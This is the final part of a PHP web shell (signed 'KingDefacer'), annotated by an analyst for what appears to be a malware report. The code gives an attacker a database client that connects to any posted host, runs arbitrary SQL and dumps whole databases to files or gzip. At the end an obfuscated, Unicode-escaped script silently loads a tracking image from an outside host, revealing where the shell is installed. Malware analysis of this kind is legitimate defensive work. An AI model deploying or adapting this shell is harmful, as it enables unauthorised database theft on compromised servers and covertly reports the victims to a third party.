$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
else
{
echo($dump_file);
ob_flush();
}
$dump_file='';
}
}
mysql_free_result($result2);
if($archive!='none')
{
$dump_file=gzencode($dump_file);
header('Content-Length: '.strlen($dump_file)."\n");
echo $dump_file;
}else if($t_f)
{
fclose($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
}
}
}
break;
}
// 'query' (default mysql action): renders the client form, then runs POST 'query' on the chosen server.
case 'query' :
{
echo($head.$pages);
// The form below echoes the posted user, passwd, host and db values back into value attributes without
// htmlspecialchars(); the password field is a plain text input. Only the query text is HTML-escaped.
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?
// A connection is attempted on every render of this view, using whatever host and credentials were posted.
$mysql_link=@mysql_connect($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
// The posted SQL is executed verbatim (after magic-quotes unescaping). Database audit logs showing
// ad-hoc statements that originate from the web host are the matching detection point.
$result=@mysql_query($query,$mysql_link);
if(!($result))echo(mysql_error());
else
{
// Result set rendered as an HTML table; field names and cell values are HTML-escaped.
echo("<table valign=top align=left>\n<tr>");
for($i=0;$i<mysql_num_fields($result);$i++)
echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
echo("\n</tr>\n");
for($i=0;$i<mysql_num_rows($result);$i++)
{
$rows=mysql_fetch_array($result);
echo('<tr valign=top align=left>');
for($j=0;$j<mysql_num_fields($result);$j++)
{
echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
}
echo("</tr>\n");
}
echo("</table>\n");
}
mysql_close($mysql_link);
}
break;
}
}
break;
}
}
// NOTE(analysis): the trailing markup below is emitted on every response that reaches the end of the script.
// The \uXXXX-escaped document.write() string decodes to a 1x1 <img> whose src is
// hxxp://alturks[.]com/snf/s[.]php (the URL listed in this report's URLs section). Any browser that renders
// the shell therefore requests that URL, which could disclose the shell's location to that host (for example
// through the Referer header). Treat outbound requests to it as an indicator for this sample.
?>

<h1>Edited By KingDefacer<h1>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>